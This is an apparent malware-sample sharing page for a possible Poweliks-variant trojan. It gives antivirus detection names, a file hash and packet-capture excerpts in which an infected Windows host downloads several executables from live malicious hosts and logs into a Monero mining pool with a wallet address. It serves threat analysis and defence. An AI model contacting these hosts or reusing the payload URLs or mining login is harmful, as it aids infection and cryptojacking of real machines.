Possible Poweliks Variant Trojan Malware Adware Pay-per-Download Bitcoin Cryptocurrency PCAP file download traffic sample

Download Attachments

  • 1 pcap lnk
    lnk
    Date added: July 3, 2017 9:57 pm Added by: admin File size: 2 MB Downloads: 62

 

ESET-NOD32 NSIS/TrojanDownloader.Agent.NVZ 20170703
Fortinet W32/Agent.NVS!tr.dldr 20170629
Invincea heuristic 20170607
Kaspersky Trojan.Win32.Poweliks.adbd 20170703
McAfee Artemis!DD96CB7EFE6D 20170703
McAfee-GW-Edition BehavesLike.Win32.Vopak.kc 20170703
Microsoft Trojan:Win32/Starter.P 20170703
Palo Alto Networks (Known Signatures) generic.ml 20170703
Qihoo-360 Win32/Trojan.1e3 20170703
Rising Adware.ConvertAd!1.A1B5 (cloud:zJ49DXPzuCC) 20170703
SentinelOne (Static ML) static engine – malicious 20170516
Sophos Mal/Generic-S 20170703
Tencent Nsis.Trojan-downloader.Agent.Wuqw 20170703
TrendMicro-HouseCall Suspicious_GEN.F47V0703 20170703
VBA32 suspected of Trojan.Downloader.gen.h 20170630
VIPRE Trojan.Win32.Generic!BT 20170703
ZoneAlarm by Check Point Trojan.Win32.Poweliks.adbd 20170703

 

SHA256: f1877f0fd9bcaa4ee4498eb8f7c55cf2086313f2209caa18ef597898d2376e72
File name: lnk.php
Detection ratio: 25 / 61
Analysis date: 2017-07-03 21:51:38 UTC ( 0 minutes ago )

 

https://virustotal.com/en/file/f1877f0fd9bcaa4ee4498eb8f7c55cf2086313f2209caa18ef597898d2376e72/analysis/1499118698/

 

2017-07-03 15:34:00.193162 IP 192.168.1.102.60285 > 198.50.183.24.80: Flags [P.], seq 0:390, ack 1, win 256, length 390: HTTP: GET /lnk.php HTTP/1.1
E…-.@….0…f.2…}.P8@.
L.q.P…….GET /lnk.php HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: syska.gdn
Connection: Keep-Alive

2017-07-03 15:34:36.065319 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 0:131, ack 1, win 256, length 131
E…pf@…(‘…f.P.a…J/. .b*z=P…….GET /30.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:36.366793 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 0:131, ack 1, win 256, length 131
E…pg@…(&…f.P.a…J/. .b*z=P…….GET /30.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

 

2017-07-03 15:34:44.119376 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 131:262, ack 486923, win 256, length 131
E…q.@…’u…f.P.a…J/.!yb1.GP…D”..GET /20.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:56.011332 IP 192.168.1.102.60289 > 198.50.183.24.80: Flags [P.], seq 0:130, ack 1, win 256, length 130: HTTP: GET /nm/geoip.php HTTP/1.1
E…-.@……..f.2…..Py&..T.|PP….>..GET /nm/geoip.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cydro.gdn
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:56.067684 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 262:392, ack 1511166, win 255, length 130
E…r?@…&O…f.P.a…J/.!.bA.:P….Z..GET /7.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

 

2017-07-03 15:35:07.289892 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 392:523, ack 2443112, win 256, length 131
E…s-@…%`…f.P.a…J/.”~bO..P…d…GET /45.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

 

2017-07-03 15:35:13.808692 IP 192.168.1.102.60839 > 75.75.75.75.53: 1813+ A? xmr.crypto-pool.fr. (36)
E..@c…..~….fKKKK…5.,.Q………….xmr.crypto-pool.fr…..
2017-07-03 15:35:14.095181 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [S], seq 3285038852, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..46’@……..f.S.)…
………. ..%…………..
2017-07-03 15:35:14.199441 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [.], ack 203640344, win 256, length 0
E..(6(@……..f.S.)…
…..#N.P………….
2017-07-03 15:35:14.201398 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [P.], seq 0:197, ack 1, win 256, length 197
E…6)@….V…f.S.)…
…..#N.P….v..{“method”: “login”, “params”: {“login”: “49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY”, “pass”: “x”, “agent”: “cpuminer-multi/1.2-dev”}, “id”: 1}

2017-07-03 15:35:14.438781 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [.], ack 304, win 255, length 0
E..(6*@……..f.S.)…
…..#OGP………….
2017-07-03 15:35:15.212929 IP 192.168.1.102.60840 > 75.75.75.75.53: 41488+ A? nottotrack.com. (32)
E..<c ….~….fKKKK…5.(.m…………
nottotrack.com…..
2017-07-03 15:35:15.319740 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [S], seq 1077723448, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.6@….V…f..`”…P@<.8…… .w……………
2017-07-03 15:35:15.420292 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [.], ack 550699079, win 256, length 0
E..(.7@….a…f..`”…P@<.9 ..GP….8……..
2017-07-03 15:35:15.427728 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [P.], seq 0:106, ack 1, win 256, length 106: HTTP: GET /proxy/get_build.php HTTP/1.0
E….8@……..f..`”…P@<.9 ..GP…….GET /proxy/get_build.php HTTP/1.0
Host: nottotrack.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2017-07-03 15:37:05.377167 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4464826, win 5446, length 0
E..(j)@….n…f..`”.i..(8j.Gz..P..F3}……..
2017-07-03 15:37:05.378957 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4469206, win 5446, length 0
E..(j*@….m…f..`”.i..(8j.Gz..P..F”a……..
2017-07-03 15:37:05.380518 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4473586, win 5446, length 0
E..(j+@….l…f..`”.i..(8j.Gz.8P..F.E……..
2017-07-03 15:37:05.381921 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4477966, win 5446, length 0
E..(j,@….k…f..`”.i..(8j.Gz.TP..F.)……..
2017-07-03 15:37:05.382248 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4479426, win 5446, length 0
E..(j-@….j…f..`”.i..(8j.Gz..P..F.t……..
2017-07-03 15:37:05.385510 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4491106, win 5417, length 0
E..(j.@….i…f..`”.i..(8j.G{..P..)……….
2017-07-03 15:37:05.388535 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4501326, win 5417, length 0
E..(j/@….h…f..`”.i..(8j.G{C.P..)……….
2017-07-03 15:37:05.397221 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4515926, win 5383, length 0
E..(j0@….g…f..`”.i..(8j.G{|.P…l………
2017-07-03 15:37:05.397349 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4530526, win 5383, length 0
E..(j1@….f…f..`”.i..(8j.G{..P…3………
2017-07-03 15:37:05.397356 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4531986, win 5383, length 0
E..(j2@….e…f..`”.i..(8j.G{.XP…-c……..
2017-07-03 15:37:05.401019 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4543666, win 5366, length 0
E..(j3@….d…f..`”.i..(8j.G{..P………….
2017-07-03 15:37:05.407107 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4558266, win 5366, length 0
E..(j4@….c…f..`”.i..(8j.G|”.P………….
2017-07-03 15:37:05.407261 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4565566, win 5366, length 0
E..(j5@….b…f..`”.i..(8j.G|>.P….G……..
2017-07-03 15:37:05.412163 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4578706, win 5355, length 0
E..(j6@….a…f..`”.i..(8j.G|q.P…v………

Share

Leave a Reply